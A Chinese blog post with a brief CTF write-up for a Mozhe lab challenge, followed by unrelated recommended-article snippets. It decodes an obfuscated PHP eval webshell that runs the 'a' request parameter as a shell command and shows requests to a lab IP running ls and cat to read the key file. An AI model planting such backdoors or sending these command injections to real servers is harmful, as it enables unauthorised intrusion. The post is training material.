【WEB】PHP代码分析溯源(PHP文件包含)

最新推荐文章于 2021-07-29 18:24:59 发布
最新推荐文章于 2021-07-29 18:24:59 发布
阅读量1.6k 收藏
点赞数
分类专栏: CTF 文章标签: WEB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014549283/article/details/81782893
版权

【原题】

https://www.mozhe.cn/bug/detail/T0YyUmZRa1paTkJNQ0JmVWt3Sm13dz09bW96aGUmozhe

【题干】

网页显示源码 eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); 

【解法】

在 在线运行PHP网站 中调试得到echo `$_REQUEST[a]`  

于是可以在get参数a里面 加入php命令

浏览目录

 http://219.153.49.228:49116/f.php?a=ls

 可以看到key文件名,然后 

http://219.153.49.228:49116 /f.php?a=cat%20key_1358523395911.php

 查看网页源码可以找到KEY值

pcy190
关注
专栏目录
悠久防伪防窜货追溯系统php+mysql版
06-20
系统特性 ① 记录查询次数、查询时间、查询者IP地址。 ② 查询结果提示信息可以后台任意设置。查询结果自动发送到管理员邮箱。 ③ 可批量生成、导入、导出、删除防伪码。支持在线批量上传导入,支持导入其它系统防伪码。(支持格式:txt,xls或xlsx,csv) 此为免费试用版。 正式版支持微信查询,二维码扫描查询,网页输入查询。 正式版演示 www.fwxt.cn
墨者学院 - PHP代码分析溯源(第3题)
多崎巡礼的博客
08-03 677
在for 循环中是判断输入的字符是否有存在在1和9之间的数字 如果不存在判断是否等于54975581388 等于则绕过 即 又不能等于数字1-9又要等于54975581388 但是这里在比较的时候就是用弱类型的,所以不要求完全一致。 php在转码时会把16进制转化为十进制.于是把54975581388转化成16进制0xccccccccc 键入 0xccccccccc 输入得到key...
PHP防伪防串货溯源系统源码
weixin_33948416的博客
06-11 4597
PHP开发的防伪防串货溯源系统源码,简洁美观的风格,使用步骤简单,进入溯源公共平台、输入产品溯源码、查看溯源信息,输入要查询的防伪码(溯源码)内容。就会自动溯源或者辨别真假。下载地址:www.sucaihuo.com/source/5919… 转载于:https://juejin.im/post/5cffac9df265da1ba328bc38...
php版防伪防窜货追溯系统
12-29
运行环境: php5.3或以上+mysql+zend 安装成功后直接登录后台即可
PHP代码分析溯源(第1题)
mozhe_的博客
05-25 1675
靶场地址:https://www.mozhe.cn/bug/detail/UW5xcFhsWE05akxJYjB1TzEyM2p3UT09bW96aGUmozhe靶场显示一段PHP源码,经分析:1、“^”为异或运算符。在PHP中,两个变量进行异或时,会将字符串转换成二进制再进行异或,异或完,又将结果从二进制转换成了字符串。2、$_++;这行代码的意思是对变量名为"_"的变量进行自增操作,在PHP中...
PHP魔众一物一码溯源防伪系统 v2.0.0
10-21
2. **部署程序**:将压缩包解压后,将`wwwroot`目录下的所有文件上传至服务器的Web根目录。 3. **配置数据库**:根据`install.html`指引,配置系统的数据库连接信息,包括数据库地址、用户名、密码和数据库名。 4....
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞分析溯源 一、WebShell 文件上传漏洞概述 WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用...
php+mysql单条件通用防伪溯源查询系统 v2020.zip
最新发布
03-27
"inc"目录可能包含了系统的公共函数库或者配置文件,这些文件通常包含了与数据库交互的函数、全局变量设置以及安全相关的函数等,是系统运行的核心部分。 "user"目录可能包含用户界面相关文件,比如用户注册、登录...
追溯码生成的原理及规则
12-13
关于追溯码生成的原理及规则,追溯码包含产品码、产地码、批次、认证类型, 通过一串数字(40个字节左右) 压缩成20个字节,通过这个追溯码即可以读出产品、企业、批次信息,不依靠数据库哦
predaddy-issuetracker-sample:基于 predaddy 的示例事件溯源应用程序
06-21
从src/resources/mysql_init.sql加载 sql 转储可选:修改log4php配置文件,可以在这里找到src/resources/log4php.xml webserver中的文档根目录必须如下: src/hu/szjani/presentation/web/public截屏
墨者学院 - PHP代码分析溯源(第4题)
多崎巡礼的博客
08-05 1101
打开发现提示key在根目录,且给出代码 <?php eval(gzinflate(base64_decode(&40pNzshXSFCJD3INDHUNDolOjE2wtlawt+MCAA==&))); ?>  这是base64加密+压缩的编码 简单方法就是直接把eval改成echo输出 执行<?php echo(gzinflate(base64_decode(‘...
PHP本地包含漏洞代码溯源
qq_36933272的博客
09-04 372
查看源代码,发现r.php,而且包含key的文件在系统根目录中 根据r.php的内容,使用$_GET 变量来收集表单数据,提交p参数,值为txt的名称key_is_here 因为文件是系统根目录,所以输入http://219.153.49.228:48651/r.php?p=/the_key_is_here.txt 得到key ...
php农产品防伪追溯系统源码
www_5438xiazai的博客
07-29 1957
简介: php农产品防伪追溯系统源码,该系统采用最简单易用的php+MySQL进行搭建,拥有完善的网站前后台, 通过对每件产品生产线上的单品、二级包装、等各级包装赋予唯一的监管条码,在生产线上将此数据和经销商信息一起上传至服务器。 功能介绍: 1、基本资料管理:用于出货时选择参数,必须先设定、客户资料:添加、修改、删除、管理代理商资料;产品资料:添加、修改、删除、管理产品资料。条码对应关系导入(CS版本):导入套标数据,建立标签关系。 2、产品管理:出货扫描:设定产品出货地区、出货代理商、产品名称等信息扫
RFID防伪溯源系统
gumenghua_com1的博客
12-22 524
vs2017+access数据库,用C#与wpf开发前端,有分级登录与增删查改数据功能。通过usb连接电脑可以实现读取数据信息。 文件:n459.com/file/25127180-477056635 以下内容无关: -------------------------------------------分割线--------------------------------------------- SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好
PHP通过推广二维码追溯统计用户来源
江南极客
11-14 2507
为了满足用户渠道推广分析的需要,公众平台提供了生成带参数二维码的接口。使用该接口可以获得多个带不同场景值的二维码,用户扫描后,公众号可以接收到事件推送。推广用户在生成自己的推广二维码的时候,可以带上用户的身份标识(比如用户id),那么其他人在扫描这个带有UID参数的二维码关注公众号时,公众号可以获取到二维码里边的参数(即UID),那么就很容易判断和追溯用户来源了。
恶意代码攻击溯源与样本分析详解
本文主要探讨了恶意代码攻击的溯源及恶意样本分析,涵盖了学术界和产业界的视角,涉及特征提取、预处理、相似性计算、同源判定等多个方面,并介绍了产业界的恶意攻击流程及溯源方法。 一. 前言 网络安全事件与恶意...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值